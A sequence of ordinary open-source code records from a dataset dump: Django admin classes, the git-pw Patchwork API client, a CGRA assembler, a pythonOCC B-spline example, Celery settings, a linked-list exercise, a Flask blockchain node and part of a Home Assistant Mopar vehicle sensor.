group__type=GroupType.STUDYYEAR\n )\n )\n if self.value() == \"true\":\n return queryset.filter(connected_query)\n if self.value() == \"false\":\n return queryset.filter(~connected_query)\n\n\n@admin.register(models.User)\nclass UserAdmin(admin.ModelAdmin):\n list_display = (\"user_id\", \"first_name\", \"last_name\")\n search_fields = (\"user_id\", \"first_name\", \"last_name\")\n\n list_filter = (\n \"gender\",\n \"public_event_registrations\",\n AffiliatedStudyListFilter,\n AffiliatedStudyyearListFilter,\n SlackConnectedListFilter,\n )\n\n\n@admin.register(models.Event)\nclass 
EventAdmin(admin.ModelAdmin):\n list_display = (\"title\", \"start_date\", \"location\", \"category\", \"organizer\")\n search_fields = (\n \"title\",\n \"description\",\n \"location\",\n )\n\n list_filter = (\n \"sign_up\",\n \"start_date\",\n \"category\",\n \"organizer\",\n )\n\n\nclass StrikesOverview(models.User):\n class Meta:\n verbose_name_plural = \"Strikes Overview\"\n proxy = True\n\n\n@admin.register(StrikesOverview)\nclass StrikesOverviewAdmin(UserAdmin):\n list_display = (\n \"user_id\",\n \"first_name\",\n \"last_name\",\n \"active_strikes\",\n )\n\n def active_strikes(self, obj):\n return obj.number_of_strikes\n\n def get_actions(self, request):\n \"\"\"Disallow bulk modifications/deletions of users through this panel.\"\"\"\n return []\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n active_strikes = models.Strike.objects.active()\n return qs.filter(strikes__in=active_strikes).distinct()\n\n def has_add_permission(self, request):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\n@admin.register(LogEntry)\nclass LogEntryAdmin(admin.ModelAdmin):\n actions = None\n\n date_hierarchy = \"action_time\"\n\n list_filter = [\"user\", \"content_type\", \"action_flag\"]\n\n search_fields = [\"object_repr\", \"change_message\"]\n\n list_display = [\n \"action_time\",\n \"user\",\n \"content_type\",\n \"object_link\",\n \"action_flag\",\n ]\n\n def has_add_permission(self, request):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if \"admin/logentry\" in request.path:\n return False\n return True\n\n def has_view_permission(self, request, obj=None):\n return request.user.is_superuser\n\n def object_link(self, obj):\n if obj.action_flag == DELETION:\n link = escape(obj.object_repr)\n else:\n ct = obj.content_type\n link = '
<a href=\"%s\">%s</a>' % (\n                reverse(\n                    \"admin:%s_%s_change\" % (ct.app_label, ct.model),\n                    args=[obj.object_id],\n                ),\n                escape(obj.object_repr),\n            )\n        return mark_safe(link)\n\n    object_link.admin_order_field = \"object_repr\"\n    object_link.short_description = \"object\"\n","repo_name":"TIHLDE/Lepton","sub_path":"app/content/admin/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"} +{"seq_id":"24112852516","text":"\"\"\"\nSimple wrappers around request methods.\n\"\"\"\n\nfrom functools import update_wrapper\nimport logging\nimport os.path\nimport re\nimport sys\nimport tempfile\nimport typing as ty\n\nimport click\nimport requests\n\nimport git_pw\nfrom git_pw import config\n\nCONF = config.CONF\nLOG = logging.getLogger(__name__)\n\nFilters = ty.List[ty.Tuple[str, str]]\n\n\nclass HTTPTokenAuth(requests.auth.AuthBase):\n    \"\"\"Attaches HTTP Token Authentication to the given Request object.\"\"\"\n\n    def __init__(self, token: str):\n        self.token = token\n\n    def __call__(\n        self,\n        r: requests.PreparedRequest,\n    ) -> requests.PreparedRequest:\n        r.headers['Authorization'] = self._token_auth_str(self.token)\n        return r\n\n    @staticmethod\n    def _token_auth_str(token: str) -> str:\n        \"\"\"Return a Token auth string.\"\"\"\n        return 'Token {}'.format(token.strip())\n\n\ndef _get_auth(optional: bool = False) -> ty.Optional[requests.auth.AuthBase]:\n    if CONF.token:\n        return HTTPTokenAuth(CONF.token)\n    elif CONF.username and CONF.password:\n        return requests.auth.HTTPBasicAuth(CONF.username, CONF.password)\n    elif not optional:\n        LOG.error('Authentication information missing')\n        LOG.error(\n            'You must configure authentication via git-config or via '\n            '--token or --username, --password'\n        )\n        sys.exit(1)\n    return None\n\n\ndef _get_headers() -> ty.Dict[str, str]:\n    return {\n        'User-Agent': 'git-pw ({})'.format(git_pw.__version__),\n    }\n\n\ndef _get_server() -> str:\n    if CONF.server:\n        server = CONF.server.rstrip('/')\n\n        if not re.match(r'.*/api/\\d\\.\\d$', server):\n            LOG.warning('Server version missing')\n            LOG.warning(\n                'You should provide the server version in the URL '\n                'configured via git-config or --server'\n            )\n            LOG.warning('This will be required in git-pw 2.0')\n\n        if not re.match(r'.*/api(/\\d\\.\\d)?$', server):\n            # NOTE(stephenfin): We've already handled this particular error\n            # above so we don't warn twice. We also don't stick on a version\n            # number since the user clearly wants the latest\n            server += '/api'\n\n        return server\n    else:\n        LOG.error('Server information missing')\n        LOG.error(\n            'You must provide server information via git-config or via '\n            '--server'\n        )\n        sys.exit(1)\n\n\ndef _get_project() -> str:\n    if CONF.project and CONF.project.strip() == '*':\n        return ''  # just don't bother filtering on project\n    elif CONF.project:\n        return CONF.project.strip()\n    else:\n        LOG.error('Project information missing')\n        LOG.error(\n            'You must provide project information via git-config or '\n            'via --project'\n        )\n        LOG.error('To list all projects, set project to \"*\"')\n        sys.exit(1)\n\n\ndef _handle_error(\n    operation: str,\n    exc: requests.exceptions.RequestException,\n) -> None:\n    if exc.response is not None and exc.response.content:\n        # server errors should always be reported\n        if exc.response.status_code in range(500, 512):  # 5xx Server Error\n            LOG.error(\n                'Server error. 
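# --- Illustrative aside (not part of the dataset records above) ---
# The study/studyyear list filters in admin.py above hinge on Django's
# Exists/OuterRef correlated subquery. A hedged sketch of the same idiom
# outside the admin, reusing the imports that admin.py itself declares
# (this only runs inside that project's configured Django context):
from django.db.models import Exists, OuterRef

from app.common.enums import GroupType
from app.content import models
from app.group.models.membership import Membership

has_study = Exists(
    Membership.objects.filter(
        user__user_id=OuterRef("pk"), group__type=GroupType.STUDY
    )
)

users_with_study = models.User.objects.filter(has_study)
users_without_study = models.User.objects.filter(~has_study)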
Please report this issue to '\n 'https://github.com/getpatchwork/patchwork'\n )\n raise\n\n # we make the assumption that all responses will be JSON encoded\n if exc.response.status_code == 404:\n LOG.error('Resource not found')\n else:\n LOG.error(exc.response.json())\n else:\n LOG.error(\n 'Failed to %s resource. Is your configuration '\n 'correct?' % operation\n )\n LOG.error(\"Use the '--debug' flag for more information\")\n\n if CONF.debug:\n raise\n else:\n sys.exit(1)\n\n\ndef _get(\n url: str,\n params: ty.Optional[Filters] = None,\n stream: bool = False,\n) -> requests.Response:\n \"\"\"Make GET request and handle errors.\"\"\"\n LOG.debug('GET %s', url)\n\n try:\n # TODO(stephenfin): We only use a subset of the types possible for\n # 'params' (namely a list of tuples) but it doesn't seem possible to\n # indicate this\n rsp = requests.get(\n url,\n auth=_get_auth(optional=True),\n headers=_get_headers(),\n stream=stream,\n params=params,\n ) # type: ignore\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('fetch', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef _post(\n url: str,\n data: ty.List[ty.Tuple[str, ty.Any]],\n) -> requests.Response:\n \"\"\"Make POST request and handle errors.\"\"\"\n LOG.debug('POST %s, data=%r', url, data)\n\n try:\n rsp = requests.post(\n url, auth=_get_auth(), headers=_get_headers(), data=data\n )\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('create', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef _patch(\n url: str,\n data: ty.List[ty.Tuple[str, ty.Any]],\n) -> requests.Response:\n \"\"\"Make PATCH request and handle errors.\"\"\"\n LOG.debug('PATCH %s, data=%r', url, data)\n\n try:\n rsp = requests.patch(\n url,\n auth=_get_auth(),\n headers=_get_headers(),\n data=data,\n )\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('update', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef _delete(url: str) -> requests.Response:\n \"\"\"Make DELETE request and handle errors.\"\"\"\n LOG.debug('DELETE %s', url)\n\n try:\n rsp = requests.delete(url, auth=_get_auth(), headers=_get_headers())\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('delete', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef version() -> ty.Tuple[int, int]:\n \"\"\"Get the version of the server from the URL, if present.\"\"\"\n server = _get_server()\n\n version = re.match(r'.*/(\\d)\\.(\\d)$', server)\n if version:\n return (int(version.group(1)), int(version.group(2)))\n\n # return the oldest version we support if no version provided\n return (1, 0)\n\n\ndef download(\n url: str,\n params: ty.Optional[Filters] = None,\n output: ty.Optional[ty.Optional[str]] = None,\n) -> ty.Optional[str]:\n \"\"\"Retrieve a specific API resource and save it to a file/stdout.\n\n The ``Content-Disposition`` header is assumed to be present and\n will be used for the output filename, if not writing to stdout.\n\n Arguments:\n url: The resource URL.\n params: Additional parameters.\n output: The output file. 
If output is a directory then\n the file name will be according to the patch subject and\n will be downloaded into the output directory.\n If None, a temporary file will be used.\n\n Returns:\n A path to an output file containing the content, else None if stdout\n used.\n \"\"\"\n rsp = _get(url, params, stream=True)\n\n # we don't catch anything here because we should break if these are missing\n header = re.search(\n 'filename=(.+)',\n rsp.headers.get('content-disposition') or '',\n )\n if not header:\n LOG.error('Filename was expected but was not provided in response')\n sys.exit(1)\n\n if output == '-':\n output_path = output\n output_file = sys.stdout.buffer\n else:\n if output:\n output_path = output\n if os.path.isdir(output):\n output_path = os.path.join(output, header.group(1))\n else:\n output_path = os.path.join(\n tempfile.mkdtemp(prefix='git-pw'),\n header.group(1),\n )\n LOG.debug('Saving to %s', output_path)\n output_file = open(output_path, 'wb')\n\n try:\n # we use iter_content because patches can be binary\n for block in rsp.iter_content(1024):\n output_file.write(block)\n finally:\n output_file.close()\n\n return output_path\n\n\ndef index(resource_type: str, params: ty.Optional[Filters] = None) -> dict:\n \"\"\"List API resources.\n\n GET /{resource}/\n\n All resources are JSON bodies, thus we can access them in a similar\n fashion.\n\n Arguments:\n resource_type: The resource endpoint name.\n params: Additional parameters, filters.\n\n Returns:\n A list of dictionaries, representing the summary view of each resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, ''])\n\n # NOTE(stephenfin): Not all endpoints in the Patchwork API allow filtering\n # by project, but all the ones we care about here do.\n params = params or []\n params.append(('project', _get_project()))\n\n return _get(url, params).json()\n\n\ndef detail(\n resource_type: str,\n resource_id: ty.Union[str, int],\n params: ty.Optional[Filters] = None,\n) -> ty.Dict:\n \"\"\"Retrieve a specific API resource.\n\n GET /{resource}/{resourceID}/\n\n Arguments:\n resource_type: The resource endpoint name.\n resource_id: The ID for the specific resource.\n params: Additional parameters.\n\n Returns:\n A dictionary representing the detailed view of a given resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, str(resource_id), ''])\n\n return _get(url, params, stream=False).json()\n\n\ndef create(\n resource_type: str,\n data: ty.List[ty.Tuple[str, ty.Any]],\n) -> dict:\n \"\"\"Create a new API resource.\n\n POST /{resource}/\n\n Arguments:\n resource_type: The resource endpoint name.\n params: Fields to update.\n\n Returns:\n A dictionary representing the detailed view of a given resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, ''])\n\n return _post(url, data).json()\n\n\ndef delete(resource_type: str, resource_id: ty.Union[str, int]) -> None:\n \"\"\"Delete a specific API resource.\n\n DELETE /{resource}/{resourceID}/\n\n Arguments:\n resource_type: The resource endpoint name.\n resource_id: The ID for the specific resource.\n\n Returns:\n A dictionary representing the detailed view of a given resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, str(resource_id), ''])\n\n _delete(url)\n\n\ndef update(\n resource_type: 
str,\n    resource_id: ty.Union[str, int],\n    data: ty.List[ty.Tuple[str, ty.Any]],\n) -> dict:\n    \"\"\"Update a specific API resource.\n\n    PATCH /{resource}/{resourceID}/\n\n    Arguments:\n        resource_type: The resource endpoint name.\n        resource_id: The ID for the specific resource.\n        params: Fields to update.\n\n    Returns:\n        A dictionary representing the detailed view of a given resource.\n    \"\"\"\n    # NOTE(stephenfin): All resources must have a trailing '/'\n    url = '/'.join([_get_server(), resource_type, str(resource_id), ''])\n\n    return _patch(url, data).json()\n\n\ndef validate_minimum_version(\n    min_version: ty.Tuple[int, int],\n    msg: str,\n) -> ty.Callable[[ty.Any], ty.Any]:\n    def inner(f):\n        @click.pass_context\n        def new_func(ctx, *args, **kwargs):\n            if version() < min_version:\n                LOG.error(msg)\n                sys.exit(1)\n\n            return ctx.invoke(f, *args, **kwargs)\n\n        return update_wrapper(new_func, f)\n\n    return inner\n\n\ndef validate_multiple_filter_support(f: ty.Callable) -> ty.Callable:\n    @click.pass_context\n    def new_func(ctx, *args, **kwargs):\n        if version() >= (1, 1):\n            return ctx.invoke(f, *args, **kwargs)\n\n        for param in ctx.command.params:\n            if not param.multiple:\n                continue\n\n            if param.name in ('headers',):\n                continue\n\n            value = list(kwargs[param.name] or [])\n            if value and len(value) > 1 and value != param.default:\n                msg = (\n                    'The `--%s` filter was specified multiple times. '\n                    'Filtering by multiple %ss is not supported with API '\n                    'version 1.0. If the server supports it, use version '\n                    '1.1 instead. Refer to https://tinyurl.com/2p8swbpn for '\n                    'more information.'\n                )\n\n                LOG.warning(msg, param.name, param.name)\n\n        return ctx.invoke(f, *args, **kwargs)\n\n    return update_wrapper(new_func, f)\n\n\ndef retrieve_filter_ids(\n    resource_type: str,\n    filter_name: str,\n    filter_value: str,\n) -> ty.List[ty.Tuple[str, str]]:\n    \"\"\"Retrieve IDs for items passed through by filter.\n\n    Some filters require client-side filtering, e.g. filtering patches by\n    submitter names.\n\n    Arguments:\n        resource_type: The filter's resource endpoint name.\n        filter_name: The name of the filter.\n        filter_value: The value of the filter.\n\n    Returns:\n        A list of querystring key-value pairs to use in the actual request.\n    \"\"\"\n    if len(filter_value) < 3:\n        # protect against really generic (and essentially meaningless) queries\n        LOG.error('Filters must be at least 3 characters long')\n        sys.exit(1)\n\n    # NOTE(stephenfin): This purposefully ignores the possibility of a second\n    # page because it's unlikely and likely unnecessary\n    items = index(resource_type, [('q', filter_value)])\n    if len(items) == 0:\n        LOG.warning('No matching %s found: %s', filter_name, filter_value)\n    elif len(items) > 1 and version() < (1, 1):\n        # we don't support multiple filters in 1.0\n        msg = (\n            'More than one match found for `--%s=%s`. '\n            'Filtering by multiple %ss is not supported with '\n            'API version 1.0. If the server supports it, use '\n            'version 1.1 instead. 
Refer to https://tinyurl.com/2p8swbpn '\n 'for more information.'\n )\n\n LOG.warning(msg, filter_name, filter_value, filter_name)\n\n return [(filter_name, item['id']) for item in items]\n","repo_name":"getpatchwork/git-pw","sub_path":"git_pw/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":14319,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"75"} +{"seq_id":"17683505114","text":"import re\n\nfrom hw.utils import to_hex\nfrom src.hw.cgra_configuration import CgraConfiguration\n\n\nclass CgraAssembler:\n def __init__(self, cgra, asm_file, output_file=None):\n self.cgra = cgra\n self.cc = CgraConfiguration(cgra)\n self.asm_file = asm_file\n self.output_file = output_file\n self.alu_inst = {}\n self.routes_inst = {}\n self.const = []\n self.accumulator = []\n self.last_error = ''\n self.used_inputs = []\n self.used_outputs = []\n self.ostream_ignore = []\n self.ostream_ignore_loop = []\n\n def reset(self):\n self.alu_inst.clear()\n self.routes_inst.clear()\n self.const.clear()\n self.accumulator.clear()\n self.last_error = ''\n self.used_inputs.clear()\n self.used_outputs.clear()\n self.ostream_ignore.clear()\n self.ostream_ignore_loop.clear()\n\n def parse(self):\n f = open(self.asm_file)\n lines = f.read().split('\\n')\n f.close()\n i = 1\n self.last_error = ''\n for line in lines:\n line = line.split('//')[0]\n if line and line[0] != '#':\n line = re.sub(' +', ' ', line)\n tokens = line.split(' ')\n if tokens[0] == 'route':\n r, v = self.decode_route_inst(tokens)\n if r:\n self.routes_inst[i] = v\n else:\n self.last_error = 'line %d: %s' % (i, v)\n return\n elif tokens[0] == 'set':\n r, v = self.decode_set_inst(i, tokens)\n if not r:\n self.last_error = 'line %d: %s' % (i, v)\n else:\n r, v = self.decode_alu_inst(i, tokens)\n if r:\n self.alu_inst[i] = v\n else:\n self.last_error = 'line %d: %s' % (i, v)\n return\n i += 1\n\n def decode_set_inst(self, line, inst):\n try:\n val = max(int(inst[3]), 1)\n if inst[2] == '$ostream_ignore':\n val *= 3 # 3 é o pipeline atual da alu dos PEs.\n self.ostream_ignore.append((line, int(inst[1][1:]), val))\n elif inst[2] == '$ostream_loop':\n self.ostream_ignore_loop.append((line, int(inst[1][1:]), val))\n elif inst[2] == '$accumulator':\n self.accumulator.append((line, int(inst[1][1:]), val))\n else:\n return False, 'Invalid argument.'\n except Exception as e:\n return False, str(e)\n\n return True, ''\n\n def decode_alu_inst(self, line, inst):\n try:\n op = inst[0]\n pe = int(inst[1][1:])\n alu_src = []\n delays = []\n tok = inst[2:]\n is_istream = False\n for j in range(len(tok)):\n i = tok[j]\n if '#' in i:\n delays.append((j, int(i[1:])))\n else:\n if 'alu' in i or 'istream' in i or 'acc' in i:\n alu_src.append(i[1:])\n if 'istream' in i:\n is_istream = True\n elif '$' in i:\n alu_src.append(int(i[1:]))\n else:\n alu_src.append('const')\n self.const.append((line, pe, int(i)))\n\n for i in range(len(delays)):\n idx, v = delays[i]\n delays[i] = (alu_src.index(alu_src[idx]), v)\n\n except Exception as e:\n return False, str(e)\n if is_istream:\n self.used_inputs.append(pe)\n\n return True, [pe, op, alu_src, delays]\n\n def decode_route_inst(self, inst):\n try:\n pe = int(inst[1][1:])\n if 'alu' in inst[2][1:]:\n src = 'alu'\n else:\n src = int(inst[2][1:])\n if 'ostream' in inst[3][1:]:\n dst = 'ostream'\n else:\n dst = int(inst[3][1:])\n except Exception as e:\n return None, str(e)\n\n if dst == 'ostream':\n self.used_outputs.append(pe)\n return True, [pe, {dst: src}]\n\n def 
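# --- Illustrative aside (not part of the dataset records above) ---
# The HTTPTokenAuth class in git-pw's api.py above is a standard requests
# auth plugin: it only injects an "Authorization: Token <token>" header.
# A hedged usage sketch (httpbin.org is an arbitrary echo endpoint chosen
# here for demonstration, not part of git-pw):
import requests

class HTTPTokenAuth(requests.auth.AuthBase):
    def __init__(self, token: str):
        self.token = token

    def __call__(self, r: requests.PreparedRequest) -> requests.PreparedRequest:
        r.headers["Authorization"] = "Token {}".format(self.token.strip())
        return r

rsp = requests.get("https://httpbin.org/headers", auth=HTTPTokenAuth("s3cret"))
print(rsp.json()["headers"]["Authorization"])  # -> "Token s3cret"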
compile(self):\n self.reset()\n self.parse()\n machine_code = ''\n if self.last_error == '':\n for line, conf in self.alu_inst.items():\n r, v = self.cc.create_alu_conf(conf[0], conf[1], conf[2], conf[3])\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if 'acc' in conf[2]:\n r, v = self.cc.create_reset_conf(conf[0])\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error == '':\n for line, i, const in self.const:\n r, v = self.cc.create_const_conf(i, const)\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error == '':\n for line, i, acc in self.accumulator:\n r, v = self.cc.create_acc_reset_conf(i, acc)\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error == '':\n routing = {}\n for line, c in self.routes_inst.items():\n if c[0] in routing.keys():\n routing[c[0]].update(c[1])\n else:\n routing[c[0]] = c[1]\n\n for line, co in self.routes_inst.items():\n r, v = self.cc.create_router_conf(co[0], routing[co[0]])\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error:\n print('Compile error on %s' % self.last_error)\n return None\n\n if self.output_file:\n f = open(self.output_file, 'w')\n f.write(machine_code[:-1])\n f.close()\n print('Build succeeded, output file save in %s' % self.output_file)\n\n return machine_code[:-1]\n","repo_name":"mfkiwl/hpcgra","sub_path":"src/hw/cgra_assembler.py","file_name":"cgra_assembler.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4851155936","text":"from __future__ import print_function\n\nfrom OCC.Core.gp import gp_Pnt2d,gp_Pnt,gp_Circ,gp_Ax2\nfrom OCC.Core.Geom import Geom_Circle,Geom_BSplineCurve\nfrom OCC.Core.TColgp import TColgp_Array1OfPnt\nfrom OCC.Core.TColStd import TColStd_Array1OfReal,TColStd_Array1OfInteger\nfrom OCC.Display.SimpleGui import init_display\ndisplay, start_display, add_menu, add_function_to_menu = init_display()\n\n# the first bezier curve\narray = TColgp_Array1OfPnt(1, 4)\narray.SetValue(1, gp_Pnt(0, 0,0))\narray.SetValue(2, gp_Pnt(1, 0,0))\narray.SetValue(3, gp_Pnt(1, 1,0))\narray.SetValue(4, gp_Pnt(3, 3,0))\nweights=TColStd_Array1OfReal(1,4)\nknots=TColStd_Array1OfReal(1,3)\nmultiplicities=TColStd_Array1OfInteger(1,3)\nmultiplicities.SetValue(1,3)\nmultiplicities.SetValue(2,1)\nmultiplicities.SetValue(3,3)\nknots.SetValue(1,0.0)\nknots.SetValue(2,0.5)\nknots.SetValue(3,1.0)\nweights.SetValue(1,1.0)\nweights.SetValue(2,1.0)\nweights.SetValue(3,1.0)\nweights.SetValue(4,1.0)\n\nnurbs = Geom_BSplineCurve(array,weights,knots,multiplicities,2,False,True )\nprint(nurbs.Period())\ndisplay.DisplayShape(nurbs, update=True, color='RED')\nstart_display()\n","repo_name":"chen1180/CurveEditor_pythonOCC","sub_path":"test/create_geometry/create_nurb.py","file_name":"create_nurb.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"71191860403","text":"from __future__ import absolute_import\n\nimport os\n\nfrom celery import Celery\nfrom django.conf import settings\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings')\n\napp = 
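# --- Illustrative aside (not part of the dataset records above) ---
# Sanity check for the clamped B-spline built in create_nurb.py above: a
# degree-p curve with n poles needs knot multiplicities summing to n + p + 1,
# with end multiplicities of p + 1 when the curve is clamped (non-periodic).
# Here: 4 poles, degree 2, multiplicities [3, 1, 3] -> 3 + 1 + 3 == 4 + 2 + 1.
def is_valid_clamped_bspline(n_poles, degree, multiplicities):
    return (
        sum(multiplicities) == n_poles + degree + 1
        and multiplicities[0] == degree + 1
        and multiplicities[-1] == degree + 1
    )

assert is_valid_clamped_bspline(4, 2, [3, 1, 3])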
Celery('config')\n\napp.conf.beat_schedule = {\n 'notify-every-5-min': {\n 'task': 'team_production_system.tasks.notify',\n 'schedule': 300.0,\n },\n}\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n","repo_name":"TeamProductionSystem/Momentors_Backend","sub_path":"config/celery_settings.py","file_name":"celery_settings.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"10683363775","text":"from LL import LinkedList, Node\r\ndef printIthNode(head, index):\r\n count = 0\r\n pointer = head\r\n while count < index:\r\n pointer = pointer.next\r\n count += 1\r\n print(\"Value at %dth node: \" % (index), pointer.data)\r\nmyList = LinkedList([1, 2, 3, 4, 5])\r\n\r\nprintIthNode(myList.head, 0)","repo_name":"vardhinialuru05/ALGORITHMS","sub_path":"DSA_INTERVIEW/linkedlists/ithnode.py","file_name":"ithnode.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8971630689","text":"import sys\nimport os\nfrom pathlib import Path\n\nmyDir = os.getcwd()\nsys.path.append(myDir)\npath = Path(myDir)\nabsolute_path = str(path.parent.absolute())\nsys.path.append(absolute_path)\n\nimport requests\nfrom random import randint\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom src.blockchain.blockchain import Blockchain\nfrom src.blockchain.block import Block\nfrom src.util import is_port_in_use\nfrom src.constant import HOST\n\napp = Flask(__name__)\nCORS(app)\nblockchain = Blockchain()\n\n\n@app.route('/')\ndef index():\n return ''\n\n\n@app.route('/chain')\ndef chain():\n response = {\n 'chain': blockchain.to_json(),\n 'len': len(blockchain.chain)\n }\n return jsonify(response)\n\n\n@app.route('/length')\ndef chain_length():\n return jsonify({'len': len(blockchain.chain)})\n\n\n@app.route('/chain/add/block', methods=['POST'])\ndef add_block():\n response = {}\n\n potential_block_json = request.get_json()\n\n if blockchain.add_block(Block.from_json(potential_block_json)):\n block = blockchain.chain[-1]\n response['block'] = block.to_json()\n response['added'] = True\n else:\n response['block'] = 'Invalid block'\n response['added'] = False\n\n return jsonify(response)\n\n\n@app.route('/chain/broadcast')\ndef broadcast_chain():\n ports = all_other_ports()\n\n bc_response = {\n 'success_ports': [],\n 'fail_ports': []\n }\n\n for port in ports:\n url = f'http://{HOST}:{port}/chain/resolve'\n response = requests.post(url, json=blockchain.to_json())\n if response.status_code == 200:\n if response.json()['success']:\n bc_response['success_ports'].append(port)\n else:\n bc_response['fail_ports'].append(port)\n\n return jsonify(bc_response)\n\n\n@app.route('/chain/resolve', methods=['POST'])\ndef resolve_chain():\n rs_chain_json = request.get_json()\n rs_chain = Blockchain.from_json(rs_chain_json)\n\n response = {\n 'message': f'Current len: {len(blockchain.chain)}\\nIncoming len: {len(rs_chain.chain)}'\n }\n\n try:\n if blockchain.replace_chain(rs_chain):\n response['success'] = True\n else:\n response['success'] = False\n except Exception:\n raise ValueError('Invalid chain')\n\n return jsonify(response)\n\n\ndef all_other_ports():\n url = f'http://{HOST}:8001/ports/all/other/?current_port={server_port}'\n response = requests.get(url)\n if response.status_code == 200:\n return response.json()['ports']\n else:\n 
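# --- Illustrative aside (not part of the dataset records above) ---
# printIthNode in ithnode.py above walks `index` steps without bounds
# checking, so an out-of-range index would dereference None. A defensive
# variant of the same walk; Node here is a minimal stand-in matching only
# the attributes the script uses:
class Node:
    def __init__(self, data, next=None):
        self.data = data
        self.next = next

def node_at(head, index):
    # Return the node at `index`, or None if the list is shorter than that.
    pointer, count = head, 0
    while pointer is not None:
        if count == index:
            return pointer
        pointer, count = pointer.next, count + 1
    return None

head = Node(1, Node(2, Node(3)))
print(node_at(head, 0).data)  # 1
print(node_at(head, 5))       # None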
print('Cannot connect to ports manager')\n return ''\n\n\nif __name__ == '__main__':\n server_port = randint(5001, 5999)\n\n while is_port_in_use(server_port):\n server_port = randint(5001, 5999)\n\n print('======= register node ========')\n request_url = f'http://{HOST}:8001/ports/add/?port={str(server_port)}'\n requests.post(request_url)\n\n app.run(host=HOST, port=server_port, debug=True, use_reloader=False)\n","repo_name":"zwan0202/double-spend-attack","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"20418172495","text":"\"\"\"\nSensor for Mopar vehicles.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/sensor.mopar/\n\"\"\"\nfrom datetime import timedelta\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import DOMAIN, PLATFORM_SCHEMA\nfrom homeassistant.const import (\n ATTR_ATTRIBUTION, ATTR_COMMAND, CONF_PASSWORD, CONF_PIN, CONF_USERNAME,\n LENGTH_KILOMETERS)\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.util import Throttle\n\nREQUIREMENTS = ['motorparts==1.0.2']\n\n_LOGGER = logging.getLogger(__name__)\n\nATTR_VEHICLE_INDEX = 'vehicle_index'\n\nCOOKIE_FILE = 'mopar_cookies.pickle'\n\nMIN_TIME_BETWEEN_UPDATES = timedelta(days=7)\n\nSERVICE_REMOTE_COMMAND = 'mopar_remote_command'\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_USERNAME): cv.string,\n vol.Required(CONF_PASSWORD): cv.string,\n vol.Required(CONF_PIN): cv.positive_int,\n})\n\nREMOTE_COMMAND_SCHEMA = vol.Schema({\n vol.Required(ATTR_COMMAND): cv.string,\n vol.Required(ATTR_VEHICLE_INDEX): cv.positive_int\n})\n\n\n# pylint: disable=unused-argument\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the Mopar platform.\"\"\"\n import motorparts\n cookie = hass.config.path(COOKIE_FILE)\n try:\n session = motorparts.get_session(\n config.get(CONF_USERNAME), config.get(CONF_PASSWORD),\n config.get(CONF_PIN), cookie_path=cookie)\n except motorparts.MoparError:\n _LOGGER.error(\"Failed to login\")\n return\n\n def _handle_service(service):\n \"\"\"Handle service call.\"\"\"\n index = service.data.get(ATTR_VEHICLE_INDEX)\n command = service.data.get(ATTR_COMMAND)\n try:\n motorparts.remote_command(session, command, index)\n except motorparts.MoparError as error:\n _LOGGER.error(str(error))\n\n hass.services.register(DOMAIN, SERVICE_REMOTE_COMMAND, _handle_service,\n schema=REMOTE_COMMAND_SCHEMA)\n\n data = MoparData(session)\n add_devices([MoparSensor(data, index)\n for index, _ in 